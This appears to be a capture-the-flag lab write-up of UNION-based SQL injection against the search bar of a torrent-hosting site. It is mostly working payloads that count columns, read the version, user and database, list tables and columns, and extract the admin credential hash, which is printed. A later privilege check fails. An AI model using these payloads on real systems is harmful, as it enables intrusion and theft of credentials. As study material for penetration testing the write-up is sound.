InfoSec LAB

Popcorn_SQLi

Created: 2 min read

SQLi

The search bar in the website is confirmed to be vulnerable to SQLi

Find the number of columns

I first need to fine the number of columns within the SQL queries

The result shows that it has a different number of columns Thankfully the SQL error message also shows the entire query

-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 #

It worked! There is a total of 17 columns and the 5th columns is being displayed.

Version, DB, User

-1' UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17 #

The version is 5.1.37-1ubuntu5.5

-1' UNION SELECT 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17 #

The current user is torrent

-1' UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17 #

The current DB is torrenthoster

Tables

-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(table_name),6,7,8,9,10,11,12,13,14,15,16,17 FROM information_schema.tables WHERE table_schema="torrenthoster"#

There is a table, user. That should contain the credential for the admin user that I found earlier

Columns

-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(column_name),6,7,8,9,10,11,12,13,14,15,16,17 FROM information_schema.columns WHERE table_name="users" AND table_schema="torrenthoster"#

There is a total of 7 columns within the torrenthoster.users table.

Credential Extraction

-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(userName,":",password),6,7,8,9,10,11,12,13,14,15,16,17 FROM torrenthoster.users #

As expected, there is only the admin user. I got the password hash as well. d5bfedcee289e5e05b86daad8ee3e2e2

Unfortunately, I was unable to crack the hash

Other Databases + Lack of Privileges

-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(schema_name),6,7,8,9,10,11,12,13,14,15,16,17 FROM information_schema.schemata #

It shows only 2 databases. This is likely due to the current user not having enough privileges to check other Databases

That is a bad new as I would not be able to enumerate further or read/write files via SQLi

-1' UNION SELECT 1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,16,17 FROM mysql.user #

Attempting to extract the user column from the mysql.user table fails due to lack of privileges

Unfortunately, this would be the end of SQLi. Due to the lack of privileges, I cannot proceed further.

Interactive Graph View

Backlinks